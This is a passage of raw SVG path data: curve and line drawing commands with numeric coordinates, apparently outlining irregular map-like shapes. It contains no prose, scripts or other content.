317.37804,161.19733 z M 274.47251,148.34455 C 277.17733,146.50082 278.80483,146.6592 278.63889,148.75 C 278.52504,150.18451 279.22112,150.45595 282.5,150.25568 C 289.02963,149.85686 289.60719,149.22265 285.79601,146.63632 C 281.37849,143.6385 277.28853,142.80573 276.54167,144.752 C 276.22535,145.57633 275.3138,145.95066 274.43963,145.61521 C 273.55635,145.27626 273.15746,145.44576 273.50708,146.01145 C 273.8431,146.55515 273.22828,147 272.1408,147 C 269.00648,147 267.0833,148.05351 267.62773,149.47225 C 268.19545,150.95172 271.4293,150.41893 274.47251,148.34455 z M 345.37428,143.05556 C 345.13787,142.81111 343.94444,143.66343 342.72222,144.9496 L 340.5,147.2881 L 343.15206,145.39405 C 344.61069,144.35232 345.61069,143.3 345.37428,143.05556 z M 155,144.03518 C 155,143.50453 153.9875,142.53906 152.75,141.88967 C 150.51206,140.71531 150.51021,140.72048 152.40499,142.85449 C 154.52132,145.23803 155,145.45582 155,144.03518 z M 70,102 C 71.292687,101.1646 71.266292,101.02851 69.809017,101.01531 C 68.878976,101.00689 67.839919,101.45 67.5,102 C 66.717818,103.2656 68.041628,103.2656 70,102 z M 287,82 C 287,81.45 286.55,81 286,81 C 285.45,81 285,81.45 285,82 C 285,82.55 285.45,83 286,83 C 286.55,83 287,82.55 287,82 z M 205.13112,75.657991 C 204.51855,74.919886 204.21544,74.117895 204.45754,73.87579 C 204.69965,73.633685 201.20824,73.753237 196.69887,74.141462 C 190.1071,74.708966 188.34325,74.568267 187.70031,73.423663 C 187.26048,72.640648 185.68548,72.035526 184.20031,72.078947 L 181.5,72.157895 L 184.25,73.162281 C 185.7625,73.714693 187,74.639632 187,75.217701 C 187,75.896386 189.39315,76.097506 193.75518,75.785404 C 197.47053,75.519572 201.40803,75.652478 202.50518,76.080751 C 205.5455,77.267539 206.35832,77.136679 205.13112,75.657991 z M 252.95,74.999294 C 253.88538,74.998868 254.55536,74.036787 254.63962,72.573034 C 254.73678,70.88518 254.35836,70.308991 253.39537,70.678525 C 252.63423,70.9706 252.26046,71.612416 252.56476,72.104785 C 252.86906,72.597153 252.65731,73 252.0942,73 C 251.53109,73 250.54945,74.0125 249.91278,75.25 C 248.95746,77.106848 248.98626,77.281582 250.07759,76.25 C 250.80492,75.5625 252.0975,74.999682 252.95,74.999294 z M 285.34148,59.743511 C 284.98561,59.167706 285.52421,58.089859 286.53835,57.348296 C 288.61688,55.828441 287.31626,55.515199 285,56.977798 C 283.07697,58.192092 282.75335,62.03188 284.63489,61.309866 C 285.37938,61.024176 285.69735,60.319317 285.34148,59.743511 z M 307,59.606989 C 307,59.390833 306.30163,58.945987 305.44806,58.618443 C 304.55814,58.276947 304.15674,58.444594 304.50708,59.011454 C 305.09434,59.961658 307,60.416902 307,59.606989 z M 455.75,505.69727 C 451.75805,504.57952 450.70569,503 453.95295,503 C 456.4244,503 461,505.0521 461,506.16052 C 461,507.12722 460.79118,507.10879 455.75,505.69727 z M 376.51652,498.02673 C 376.19721,497.51007 375.29691,497.33257 374.51586,497.63229 C 372.14722,498.54122 370.8015,497.05564 372.47634,495.3808 C 374.11727,493.73988 383.5,493.77897 383.5,495.42673 C 383.5,496.8046 377.2088,499.14686 376.51652,498.02673 z M 322.24473,496.47861 C 322.41081,495.39038 322.98618,494.5 323.52334,494.5 C 324.63708,494.5 324.31687,496.02998 322.89996,497.47861 C 322.28452,498.10783 322.05058,497.7508 322.24473,496.47861 z M 1168,492.55902 C 1168,492.31648 1168.45,491.83992 1169,491.5 C 1169.55,491.16008 1170,491.35852 1170,491.94098 C 1170,492.52344 1169.55,493 1169,493 C 1168.45,493 1168,492.80156 1168,492.55902 z M 827,487 C 827,485.66667 827.66667,485 829,485 C 830.1,485 831,485.43588 831,485.96862 C 831,486.50135 831.675,486.67821 832.5,486.36163 C 833.44984,485.99714 834,486.37542 834,487.39301 C 834,488.5629 833.04801,489 830.5,489 C 827.66667,489 827,488.61905 827,487 z M 1174,479 C 1174.9395,477.24446 1174.7605,477 1172.5352,477 C 1171.1408,477 1170,476.50554 1170,475.90121 C 1170,474.13803 1175.6644,469.34088 1180.5242,466.98826 C 1183.2024,465.69178 1186.2802,463.04433 1188.1725,460.40936 C 1191.3633,455.96623 1194,454.67657 1194,457.55902 C 1194,458.55079 1194.4544,458.83722 1195.2488,458.34623 C 1195.9356,457.92174 1197.3587,457.55768 1198.4111,457.53721 C 1200.5481,457.49565 1201.9338,455.00881 1199.8333,454.98469 C 1199.1,454.97627 1197.8777,454.57524 1197.1171,454.09352 C 1195.958,453.35943 1195.9985,452.84029 1197.3671,450.88632 C 1199.6842,447.57822 1199.4524,446.38418 1195.429,440.90332 C 1191.9898,436.21813 1191.4102,432.2673 1194.6352,435.49233 C 1195.4644,436.32155 1196.75,437 1197.492,437 C 1198.234,437 1199.132,438.32432 1199.4875,439.94293 C 1199.9414,442.00953 1200.5783,442.7153 1201.6266,442.31305 C 1202.579,441.94757 1203.3122,442.47767 1203.6521,443.77767 C 1204.2548,446.08249 1207.3335,447.20538 1210.7199,446.35546 C 1212.4133,445.93044 1213,446.21396 1213,447.45733 C 1213,450.28353 1211.075,452.966 1209.4847,452.35577 C 1208.474,451.96792 1208,452.43031 1208,453.80412 C 1208,454.91407 1206.6174,456.9856 1204.9275,458.40751 C 1202.5288,460.42593 1201.4472,460.77449 1199.9947,459.99716 C 1198.5288,459.21264 1198.0086,459.39748 1197.5416,460.86887 C 1197.2156,461.89592 1196.0908,463.51286 1195.0419,464.46207 C 1193.993,465.41128 1193.3649,466.78733 1193.646,467.51995 C 1193.9833,468.39893 1193.1951,468.96219 1191.3286,469.17599 C 1189.2965,469.40877 1188.0776,470.39267 1187,472.6702 C 1185.6268,475.57239 1179.4331,479.76647 1178.2571,478.59048 C 1177.9848,478.3181 1177.1083,478.74881 1176.3095,479.54762 C 1174.1604,481.69679 1172.7373,481.35936 1174,479 z M 1228.6395,469.30615 C 1227.5133,468.17996 1227.9536,467 1229.5,467 C 1230.325,467 1231,467.42344 1231,467.94098 C 1231,469.20196 1229.4384,470.10508 1228.6395,469.30615 z M 1097.2463,466.41859 C 1096.6389,465.76837 1095.9975,464.39569 1095.821,463.36819 C 1095.6444,462.34068 1094.8644,461.00257 1094.0875,460.39461 C 1093.3107,459.78664 1092.9528,458.56545 1093.2922,457.68084 C 1093.8042,456.34662 1094.4315,456.25447 1096.9724,457.14021 C 1100.8001,458.47458 1105.3997,457.48406 1104.6346,455.49015 C 1103.8174,453.36051 1105.7613,452.66197 1106.7722,454.72199 C 1108.1005,457.42861 1106.1723,467.2801 1104.4441,466.61692 C 1103.6851,466.32566 1102.8158,466.48906 1102.5123,466.98004 C 1101.7583,468.20009 1098.5955,467.86288 1097.2463,466.41859 z M 1091,454.55902 C 1091,453.70156 1091.45,453 1092,453 C 1093.2939,453 1093.2939,454.70032 1092,455.5 C 1091.45,455.83992 1091,455.41648 1091,454.55902 z M 1096.6499,450.36831 C 1094.1691,449.50944 1092.1956,449.36013 1091.0968,449.94819 C 1090.1593,450.44993 1088.7837,450.48438 1088.04,450.02475 C 1087.2963,449.56511 1085.6331,449.38031 1084.3439,449.61408 C 1083.0548,449.84785 1082,449.58031 1082,449.01956 C 1082,448.4588 1081.1158,448 1080.0352,448 C 1078.9545,448 1077.5887,447.1 1077,446 C 1076.4113,444.9 1076.1863,444 1076.5,444 C 1076.8137,444 1076.6003,443.1217 1076.0258,442.04823 C 1075.1303,440.37494 1074.2692,440.18079 1069.9906,440.68752 C 1067.2363,441.01372 1065,440.87208 1065,440.37143 C 1065,439.87249 1066.1237,437.81057 1067.4971,435.78939 C 1068.9738,433.61624 1069.5868,431.86267 1068.9971,431.49824 C 1068.4487,431.15929 1068,431.3282 1068,431.8736 C 1068,432.41899 1067.1,433.15087 1066,433.5 C 1064.9,433.84913 1064,435.00826 1064,436.07586 C 1064,437.76662 1063.7421,437.85587 1062,436.76793 C 1060.9,436.08097 1059.9858,435.06465 1059.9684,434.50945 C 1059.9046,432.47086 1055.3886,428.44627 1051.4219,426.89291 C 1047.2246,425.24926 1044.4879,425.28622 1035,427.11474 C 1031.975,427.69772 1028.5066,428.36418 1027.2925,428.59575 C 1026.0783,428.82732 1023.8938,430.12066 1022.438,431.46984 C 1020.1494,433.5909 1018.8985,433.90769 1013.1959,433.81051 C 1009.02,433.73935 1006.4599,434.12033 1006.217,434.84906 C 1006.006,435.48208 1004.9708,436 1003.9167,436 C 1002.8625,436 1002,436.45 1002,437 C 1002,438.60091 996.3942,438.15527 992.5657,436.25 C 989.2412,434.59554 987.28972,430.40647 990.3994,431.59977 C 993.04582,432.6153 991.25638,422.55124 987.38902,414.66896 C 986.62506,413.11189 986,411.26913 986,410.57395 C 986,409.87876 985.1,408.49549 984,407.5 C 982.9,406.50451 982.00689,404.97227 982.01531,404.09501 C 982.02871,402.7 982.15218,402.68809 983,404 C 983.53316,404.825 984.01206,405.05 984.06423,404.5 C 984.1164,403.95 984.3133,401.16007 984.50179,398.30015 C 984.82354,393.41807 986.87479,387.38756 986.9849,391 C 987.01333,391.93266 987.30851,392.10181 987.76531,391.44721 C 988.9516,389.7473 995.796,385.87307 997.2055,386.10366 C 997.91747,386.22014 999.175,386.04168 1000,385.70709 C 1000.825,385.3725 1003.4626,384.5957 1005.8612,383.98088 C 1010.1784,382.87429 1015.219,378.70898 1014.7989,376.59507 C 1014.4064,374.61973 1017.4381,371.00014 1019.4905,370.99368 C 1020.6395,370.99006 1022.1793,369.79288 1023.0863,368.19786 C 1023.9588,366.66364 1026.1998,364.66874 1028.0663,363.76476 C 1031.2754,362.21055 1031.6306,362.22664 1034.598,364.06058 C 1037.9672,366.14285 1041.538,366.67954 1040.4643,364.94228 C 1040.1048,364.36054 1040.9846,362.11054 1042.4195,359.94228 C 1044.53,356.75312 1044.7232,356 1043.4309,356 C 1042.5522,356 1042.0183,355.4375 1042.2444,354.75 C 1042.7437,353.23173 1050.6806,352.50211 1052.3239,353.82342 C 1053.9449,355.12675 1059.836,356.38397 1063.75,356.26184 C 1067.1905,356.15448 1067.6426,356.93085 1065.9648,360.06574 C 1065.2512,361.39907 1065.2512,362 1065.9648,362 C 1066.5342,362 1067,362.675 1067,363.5 C 1067,364.43333 1066.0556,365 1064.5,365 C 1061.3986,365 1061.3089,366.06959 1064.25,367.98178 C 1069.2397,371.22592 1073.6712,372.76353 1075.3398,371.8297 C 1077.1507,370.8163 1077.7618,372.41116 1075.9837,373.51008 C 1074.5724,374.38231 1075.7621,376 1077.8149,376 C 1080.0204,376 1082.0208,371.38088 1082.4408,365.31849 C 1082.9525,357.93059 1084.0684,353.18813 1085.5928,351.923 C 1086.6757,351.02427 1087.1052,351.17951 1087.5695,352.63738 C 1087.8958,353.66182 1088.6572,355.625 1089.2615,357 C 1089.8659,358.375 1090.3917,360.6236 1090.4302,361.99688 C 1090.4719,363.48977 1091.1031,364.518 1092,364.55403 C 1095.4398,364.69225 1097,366.24293 1097,369.52366 C 1097,371.34398 1097.4461,372.98333 1097.9913,373.16667 C 1098.5365,373.35 1099.1546,374.98058 1099.3648,376.79017 C 1099.7553,380.1521 1100.459,381.4035 1102.0833,381.625 C 1102.5875,381.69375 1103.4154,381.80625 1103.9231,381.875 C 1105.7578,382.12345 1111,388.19902 1111,390.07692 C 1111,391.13462 1111.3375,391.94671 1111.75,391.88158 C 1114.2005,391.49466 1116,392.20288 1116,393.55423 C 1116,394.40906 1117.3479,396.54656 1118.9954,398.30423 C 1120.6428,400.06191 1121.9928,401.92351 1121.9954,402.44113 C 1121.9979,402.95875 1122.6744,402.50875 1123.4988,401.44113 C 1124.8816,399.65015 1124.9498,399.82419 1124.3804,403.69104 C 1124.041,405.99611 1124.2661,409.32457 1124.8807,411.08761 C 1125.6127,413.18756 1125.6882,415.53596 1125.0994,417.89657 C 1124.605,419.87846 1123.9267,422.71839 1123.5919,424.20754 C 1123.2571,425.69668 1121.869,428.17168 1120.5071,429.70754 C 1116.2374,434.52284 1116,434.8784 1116,436.45779 C 1116,437.30601 1115.6139,438 1115.1421,438 C 1114.6702,438 1113.8827,439.88396 1113.3921,442.18657 C 1112.5443,446.16539 1112.2528,446.4361 1107.5193,447.64181 C 1104.7799,448.33958 1102.0796,449.53828 1101.5185,450.30559 C 1100.6568,451.48406 1099.9008,451.4938 1096.6499,450.36831 z M 1071.5411,437.93347 C 1072.4127,436.52322 1071.0944,435.24513 1070.1956,436.62902 C 1069.813,437.21812 1068.825,437.95706 1068,438.27111 C 1066.9792,438.65971 1067.1999,438.86732 1068.691,438.92105 C 1069.896,438.96447 1071.1786,438.52006 1071.5411,437.93347 z M 1051,356 C 1051,355.45 1050.325,355 1049.5,355 C 1048.675,355 1048,355.45 1048,356 C 1048,356.55 1048.675,357 1049.5,357 C 1050.325,357 1051,356.55 1051,356 z M 652.96917,435.77766 C 649.87431,434.54307 647.39109,429.99436 649.20124,428.87563 C 650.63615,427.98881 645.96216,418.10148 642.01692,413.67795 C 639.43938,410.78793 636.98636,403.25707 636.57534,396.9721 C 636.35982,393.67659 633.22257,387.08627 628.87224,380.79049 C 627.84251,379.30026 627,376.56944 627,374.72199 C 627,369.70441 629.86208,360.72766 632.06379,358.83971 C 634.36757,356.86422 634.54888,353.28659 632.54131,349.41699 C 631.57029,347.54534 631.40924,346.21183 632.05958,345.42821 C 632.71753,344.63543 632.32254,342.65902 630.84995,339.37552 C 629.64733,336.69399 628.58774,334.275 628.49532,334 C 627.57634,331.26577 626.07623,329.16201 622.53623,325.64297 C 617.9887,321.12237 615.39484,316.36839 617.15561,315.78146 C 617.73447,315.58851 618.35237,314.09625 618.52873,312.46532 C 618.70509,310.83439 619.29514,308.06095 619.83994,306.30211 C 620.58082,303.91026 620.50321,302.83259 619.53203,302.02658 C 618.57069,301.22874 618.07526,301.36148 617.62385,302.53786 C 617.2885,303.41176 616.52174,303.82245 615.91993,303.45051 C 615.132,302.96355 615.13002,302.46998 615.91287,301.68713 C 618.11674,299.48326 616.93052,298.75156 612.17625,299.38223 C 607.4556,300.00845 607.28318,299.93585 604.10866,295.98559 C 600.88719,291.9769 600.82905,291.95369 595.6824,292.62192 C 592.83208,292.992 590.275,293.58483 590,293.93933 C 589.38485,294.73231 582.23089,296.97282 579.5,297.22778 C 578.4,297.33047 575.91078,297.06459 573.96839,296.63693 C 571.51428,296.0966 569.07347,296.35826 565.96839,297.49454 C 563.51078,298.39389 560.91917,299.21303 560.20926,299.31486 C 559.49935,299.41669 554.66789,296.8 549.47269,293.5 C 541.62181,288.51312 539.8446,286.90902 538.94747,284 C 538.25666,281.75999 535.94114,278.88002 532.51543,276 C 527.84118,272.07034 527.15246,271.02074 527.08139,267.71862 C 527.03217,265.43211 526.43758,263.72141 525.57732,263.3913 C 524.40789,262.94254 524.47311,262.52689 525.94374,261.05626 C 528.86768,258.13232 529.80617,243.10206 527.12071,242.2069 C 523.92251,241.14084 527.16398,234.23752 537.66542,219.75 C 539.16045,217.6875 540.94977,216 541.6417,216 C 542.33362,216 544.97234,214.60122 547.50551,212.8916 C 551.48781,210.20398 552.03471,209.42561 551.54558,207.1416 C 550.78444,203.58743 554.05612,198.41775 558.36775,196.36168 C 562.47382,194.40363 565.14725,189.46058 563.7645,186.38335 C 562.9407,184.55005 562.20153,184.33567 558.2427,184.78189 C 554.42037,185.21272 553.76839,185.04596 554.26057,183.76334 C 554.58428,182.91979 554.16901,181.25861 553.33777,180.07184 C 552.32626,178.62772 552.14766,177.51488 552.79773,176.70704 C 554.44599,174.65879 555.07236,169.65688 554.09993,166.30831 C 553.28624,163.50637 553.46723,162.92388 555.58211,161.53815 C 556.9071,160.66999 559.00566,160.1957 560.24558,160.48417 C 561.48551,160.77263 566.44069,161.18484 571.25709,161.40017 C 580.77745,161.82582 580.43965,162.02368 581.4034,155.45723 C 581.78305,152.87052 577.08178,148.3375 572.89395,147.25233 C 568.28161,146.05715 567.87198,143.3965 572.19995,142.74469 C 574.01498,142.47135 575.63408,142.59419 575.79795,143.01769 C 575.96182,143.44119 576.92204,143.57164 577.93177,143.30759 C 579.14442,142.99048 579.60198,142.19397 579.27962,140.96128 C 578.83227,139.25058 579.0633,139.19527 582.0521,140.29753 C 584.6303,141.24837 585.40197,141.23842 585.73964,140.25 C 585.9745,139.5625 587.25417,139 588.58333,139 C 590.34726,139 591,138.4503 591,136.96482 C 591,135.27221 590.67883,135.10152 589.09196,135.95078 C 588.04254,136.51242 584.21754,137.03626 580.59196,137.11487 C 576.96638,137.19349 574,137.60768 574,138.03529 C 574,138.4629 573.0976,138.57678 571.99467,138.28836 C 570.89174,137.99993 569.35681,138.28891 568.5837,138.93053 C 567.66942,139.68932 566.96101,139.74593 566.55716,139.09249 C 566.21567,138.53995 567.07174,137.34387 568.45955,136.43455 C 569.84735,135.52522 570.7306,134.37311 570.42232,133.8743 C 570.11403,133.37549 569.47399,133.20706 569,133.5 C 568.52601,133.79294 567.87557,133.60768 567.55458,133.08831 C 567.23359,132.56893 567.93695,131.8374 569.11761,131.46267 C 570.52349,131.01646 570.8619,130.53268 570.09826,130.06073 C 568.02077,128.77677 569.89503,126.25728 572.5501,126.76483 C 575.58138,127.34429 575.69898,125.92306 572.82811,123.40499 C 571.63356,122.35724 570.95598,122.01535 571.32236,122.64522 C 571.68875,123.27508 571.29273,124.05743 570.44232,124.38376 C 569.59191,124.71009 569.14191,124.5794 569.44232,124.09333 C 569.74273,123.60726 569.28758,122.94059 568.43087,122.61185 C 567.55975,122.27757 567.18964,121.50217 567.59113,120.85255 C 568.04781,120.11363 567.87128,119.96152 567.10595,120.43452 C 566.18473,121.00386 566.17722,121.50861 567.07389,122.58903 C 568.17165,123.91175 567.6504,124.44722 565.62549,124.07692 C 565.14451,123.98896 564.95797,124.99981 565.21096,126.32325 C 565.83779,129.60228 564.25717,131.3563 559.38398,132.78949 C 551.34826,135.15277 547.08393,133.77472 550.55703,129.93699 C 551.52115,128.87164 551.84648,128 551.27999,128 C 550.71349,128 550.25,126.875 550.25,125.5 C 550.25,123.57323 550.7665,123 552.50256,123 C 553.74146,123 555.31531,122.325 556,121.5 C 556.68469,120.675 558.50229,120 560.03911,120 C 561.57593,120 563.06157,119.4375 563.34054,118.75 C 563.72223,117.80932 564.11025,117.87119 564.90856,119 C 565.82396,120.29439 565.97147,120.26012 565.98469,118.75 C 565.99311,117.7875 565.325,117 564.5,117 C 563.675,117 563,116.55 563,116 C 563,115.45 563.55013,115 564.22251,115 C 564.89488,115 564.44488,114.29948 563.22251,113.4433 C 562.00013,112.58711 561,111.44799 561,110.91191 C 561,109.24976 564.15144,108.63187 565.11922,110.10428 C 565.87981,111.26147 566.21286,111.20092 567.06799,109.75 C 567.66908,108.7301 569.29548,108 570.96636,108 C 572.54319,108 574.00989,107.47033 574.22568,106.82295 C 574.44822,106.15534 575.1617,105.9819 575.87416,106.42223 C 576.85298,107.02717 576.78428,107.58088 575.56296,108.93043 C 573.62032,111.07703 574.53944,112.1537 577.64846,111.37338 C 580.25306,110.71967 580.67441,111.94723 578.84882,114.87048 C 577.85945,116.4547 578.43226,117.43314 582.92377,121.83111 C 585.79815,124.64563 587.9048,127.34502 587.60522,127.82975 C 587.30564,128.31449 588.11916,128.50872 589.41305,128.26137 C 592.48543,127.67405 593.63238,129.64375 591.55479,131.93946 C 590.04266,133.61034 590.04139,133.80191 591.53862,134.37644 C 592.43234,134.7194 593.81999,135 594.62228,135 C 596.59433,135 602,130.9178 602,129.42857 C 602,128.37772 604.50194,127.06257 607.5,126.53748 C 616.93314,124.88533 616.99536,124.85984 616.02431,123.04542 C 615.49964,122.06507 615.35453,120.9788 615.70185,120.63148 C 616.04917,120.28417 615.80833,120 615.16667,120 C 613.60619,120 613.67157,115.50186 615.25,114.26688 C 615.9375,113.72897 617.4,113.04992 618.5,112.75789 C 619.6,112.46585 621.26486,111.9114 622.19968,111.52578 C 623.57121,110.96 623.81671,111.28039 623.47129,113.18527 C 622.86072,116.55239 626.26754,118.62644 629.12332,116.62618 L 631.17383,115.18995 L 629.13251,114.54206 C 628.00978,114.18572 626.52974,112.34151 625.84353,110.44383 C 624.5079,106.75021 623.06738,106.59017 618.28518,109.60413 C 614.89241,111.7424 608.38363,111.38363 605.92268,108.92268 C 604.7417,107.7417 604.10191,106.17681 604.43993,105.29593 C 604.76695,104.44375 604.5422,103.15331 603.94049,102.42829 C 602.29571,100.44646 603.21411,96.574973 605.42928,96.152366 C 606.49038,95.949929 607.98502,95.157832 608.75071,94.39215 C 609.51639,93.626467 610.79182,93 611.585,93 C 613.01661,93 613.72862,92.716343 619.5,89.846778 C 625.49699,86.865035 627.53646,85.439519 630.36863,82.25 C 631.95586,80.4625 633.68876,79 634.21952,79 C 634.75028,79 636.2827,78.136189 637.62489,77.08042 L 640.06524,75.160841 L 636.37496,75.453647 L 632.68467,75.746453 L 635.09234,73.895463 C 637.43481,72.094587 639.66654,71.529465 643.25,71.829767 C 644.2125,71.910426 645,71.582801 645,71.10171 C 645,70.114514 649.54077,69.016427 655.5,68.562514 C 660.16496,68.207184 662.30347,67.734278 663,66.903972 C 664.07173,65.626409 669,64.96883 669,66.103393 C 669,66.886975 669.39194,66.929155 670.25,66.237917 C 672.19018,64.674956 677.34097,63.901447 678.94612,64.931999 C 679.83787,65.504529 681.06511,65.500336 682.1475,64.92106 C 683.27433,64.317998 685.6208,64.391842 688.70138,65.127311 C 696.59652,67.012226 696.75947,67.096486 694.5,68.125645 C 692.98626,68.815134 693.38289,68.93057 696.13135,68.600435 C 698.1685,68.355739 700.96249,68.786711 702.49566,69.582125 C 703.99878,70.361956 706.74538,71 708.5992,71 C 712.94117,71 728.69838,75.555518 730.46418,77.321321 C 734.20879,81.065936 725.28928,83.545718 713.75576,81.966558 C 709.24615,81.349108 705.13674,80.58451 704.62373,80.267452 C 704.11072,79.950394 704.01207,80.210512 704.40451,80.845492 C 704.79695,81.480471 706.04396,82 707.17565,82 C 708.76149,82 709.10964,82.472731 708.69409,84.061803 C 708.04874,86.529609 713.0238,90.036933 717,89.917315 C 719.49116,89.842371 719.4901,89.838496 716.7,88.821053 C 715.16,88.259474 714.08054,87.2825 714.30121,86.65 C 714.72594,85.43257 715.80204,85.42558 723,86.593496 C 726.9737,87.238255 727.35191,87.144265 726.23381,85.789852 C 725.15927,84.488218 725.462,84.049304 728.23381,82.89015 C 730.03021,82.138902 733.63611,81.51879 736.2469,81.512123 C 739.36962,81.504148 740.99487,81.072304 740.9969,80.25 C 740.99861,79.5625 740.4949,79 739.87756,79 C 739.13562,79 739.20757,78.45482 740.08981,77.391787 C 741.22382,76.025386 741.13831,75.574306 739.52112,74.391787 C 737.79062,73.126413 738.02362,73 742.08636,73 C 744.73362,73 747.56276,73.713282 749.02749,74.75 L 751.5,76.5 L 747.5,77.060053 L 743.5,77.620107 L 747.40916,78.451203 C 750.1532,79.034593 751.94042,78.89379 753.40558,77.978785 C 756.3456,76.142711 771.88459,71.985944 775.49297,72.070285 C 777.93928,72.127464 778.13704,72.282608 776.55355,72.902281 C 774.65762,73.644224 774.66042,73.677935 776.66152,74.201234 C 777.79145,74.496717 779.52839,74.2838 780.5214,73.728086 C 781.51441,73.172372 786.03996,72.668715 790.57819,72.608848 C 796.58661,72.529588 798.57477,72.192979 797.89233,71.370515 C 797.37688,70.749298 795.61524,69.973048 793.97757,69.645515 C 792.33991,69.317982 791,68.53629 791,67.908423 C 791,67.178089 791.99066,66.992188 793.75,67.392378 C 795.2625,67.73642 801,68.68415 806.5,69.498444 C 812,70.312739 818.68713,71.684082 821.36028,72.545874 C 824.03344,73.407666 826.43498,73.898352 826.69705,73.636287 C 827.5236,72.809732 822.13862,69.796292 821.04398,70.472821 C 820.46979,70.827688 820,70.416476 820,69.559017 C 820,68.701558 820.45,68 821,68 C 821.55,68 822,67.523442 822,66.940983 C 822,66.358524 821.625,66.113729 821.16667,66.396994 C 820.70833,66.68026 820.33333,66.246567 820.33333,65.433233 C 820.33333,64.619898 821.49583,63.666188 822.91667,63.313876 C 824.3375,62.961564 826.88195,61.171815 828.571,59.336655 C 832.61658,54.941126 834.77509,54.985898 841.83102,59.611694 C 842.01308,59.731051 841.67436,60.739938 841.07832,61.853665 C 840.34913,63.216154 840.32785,64.084589 841.01326,64.508194 C 841.57352,64.854458 841.86178,66.681767 841.65382,68.568882 C 841.44586,70.455997 841.55118,72.006891 841.88786,72.015313 C 842.22454,72.023735 843.14019,72.435806 843.92264,72.931027 C 845.05936,73.650466 844.60715,74.54825 841.67264,77.398048 C 839.65269,79.359688 838,81.287617 838,81.682334 C 838,82.07705 838.54,81.86 839.2,81.2 C 839.86,80.54 841.0975,79.985029 841.95,79.966731 C 844.3741,79.9147 847.58117,76.720702 847.57606,74.363614 C 847.57345,73.161127 847.06684,72.420856 846.41714,72.670172 C 844.6092,73.363942 843.7869,68.682795 845.49253,67.40663 C 846.72174,66.486928 846.56584,66.105606 844.51105,65.005916 C 841.55245,63.422518 841.97052,62.455897 845.95895,61.65821 C 848.21084,61.207831 848.80341,60.651273 848.33385,59.427624 C 847.86875,58.215576 848.19472,57.892117 849.60409,58.167202 C 850.75973,58.392764 851.5,59.373223 851.5,60.678268 C 851.5,61.855827 851.90965,63.197446 852.41033,63.659642 C 852.93022,64.139577 853.04977,64.024784 852.68906,63.391993 C 852.04534,62.262691 855.83158,60.094257 861.71444,58.223026 C 864.50394,57.335737 865.00859,57.451709 865.53183,59.100286 C 865.86345,60.145129 866.73131,61 867.4604,61 C 869.20354,61 870.23103,58.252238 868.69382,57.701512 C 865.77999,56.657595 869.6824,55.757765 880.17664,55.053763 C 886.40449,54.63597 890.4875,54.227959 889.25,54.14707 C 887.91022,54.059496 887,53.349328 887,52.391592 C 887,51.161392 887.60756,50.935673 889.58379,51.431674 C 891.07882,51.806903 891.92635,51.689851 891.59511,51.153891 C 891.08427,50.327337 893.50201,49.857173 906,48.352652 C 907.925,48.120918 915.90027,47.515161 923.72282,47.006524 C 932.77941,46.417648 938.77278,45.567432 940.22282,44.665848 C 945.81286,41.190133 956.25337,40.421574 959.73946,43.229166 C 960.42116,43.778188 965.92302,44.593256 971.96581,45.04043 C 985.8691,46.069289 989.67677,48.302429 983.5,51.805055 C 981.5,52.939183 981.5,52.939183 983.5,52.984904 C 985.16029,53.02286 985.24522,53.195278 984,54 C 982.12065,55.214527 981.63268,55.142527 993.43364,55.391924 C 1000.1036,55.532885 1003.4986,55.99581 1003.767,56.800929 C 1004.3405,58.521549 1019.0943,58.471399 1018.75,56.75 C 1018.581,55.9051 1019.7963,55.52985 1022.5,55.592107 C 1030.5234,55.77686 1038.0796,56.821143 1039.4155,57.929869 C 1041.2102,59.419334 1042.1219,63 1040.7064,63 C 1038.556,63 1041.4864,64.826289 1044.1719,65.159796 C 1045.8157,65.363939 1048.0509,64.599189 1049.9808,63.172287 C 1052.4218,61.367597 1053.426,61.108645 1054.5063,62.005263 C 1055.7282,63.019321 1060.4413,63.310128 1071.75,63.069231 C 1073.7895,63.025786 1074.9069,62.534429 1074.75,61.75 C 1074.6094,61.046957 1075.7033,60.361544 1077.25,60.183578 C 1078.7625,60.009545 1080,59.498864 1080,59.04873 C 1080,57.54854 1110.7193,60.319343 1112.3683,61.968262 C 1112.9357,62.535718 1114.4084,63 1115.641,63 C 1116.8735,63 1118.1348,63.409143 1118.4439,63.909207 C 1118.7529,64.409271 1124.292,64.754988 1130.7529,64.677467 C 1142.1217,64.54106 1149.7421,65.990248 1148.471,68.046958 C 1147.7651,69.189121 1149.3996,70.022104 1152.1607,69.927247 C 1153.4473,69.883044 1158.775,69.767493 1164,69.670467 C 1169.225,69.573441 1174.625,69.153416 1176,68.737077 C 1179.0222,67.821983 1182.2915,69.489183 1180.1655,70.861262 C 1179.124,71.533409 1179.2338,71.82704 1180.6655,72.198506 C 1183.0286,72.811636 1185.619,72.000611 1184.1659,71.102556 C 1183.5431,70.717604 1183.4534,69.884344 1183.9487,69.082991 C 1185.2407,66.992562 1210.1997,69.353114 1220.5402,72.543707 C 1224.9181,73.894518 1229.4124,74.999789 1230.5275,74.999864 C 1231.6426,74.999939 1233.5804,75.718248 1234.8337,76.596106 C 1236.0871,77.473964 1239.2247,78.315711 1241.8063,78.466653 C 1244.3878,78.617596 1248.1706,79.549619 1250.2124,80.537817 C 1253.5665,82.161136 1253.7595,82.460094 1252.2124,83.635467 C 1251.2706,84.350976 1249.2359,84.950705 1247.691,84.968197 C 1246.146,84.985688 1245.1038,85.358986 1245.375,85.797746 C 1245.6462,86.236506 1245.4978,87.194608 1245.0452,87.926861 C 1243.932,89.728089 1233.1082,88.445529 1232.331,86.420301 C 1231.9872,85.524199 1230.3249,85 1227.8273,85 C 1225.65,85 1222.9438,84.505104 1221.8136,83.900232 C 1220.6476,83.276197 1220.0224,83.227184 1220.3683,83.786925 C 1221.1321,85.022704 1219.3667,86.452099 1215.5625,87.678227 C 1212.6566,88.61482 1212.6458,88.645833 1214.5625,90.5625 C 1218.2292,94.229172 1217.1074,95.450259 1209.5,96.073234 C 1202.3823,96.656106 1187.7274,101.11151 1185,103.52176 C 1183.7563,104.62081 1183.1921,104.62149 1181.6985,103.52574 C 1179.7337,102.08443 1172.4083,102.55266 1170.25,104.2575 C 1169.4105,104.92066 1169,104.88662 1169,104.15383 C 1169,103.55247 1168.2623,103.34585 1167.3564,103.69349 C 1166.4524,104.04038 1164.5702,104.38523 1163.1738,104.45983 C 1161.7774,104.53442 1160.4388,105.1837 1160.1991,105.90267 C 1159.8942,106.81729 1160.3743,107.01598 1161.7975,106.56426 C 1164.7173,105.63757 1165.3866,107.50283 1162.5913,108.77644 C 1161.1003,109.45581 1159.8972,109.49716 1159.2899,108.88989 C 1158.2167,107.81669 1155,108.72931 1155,110.10699 C 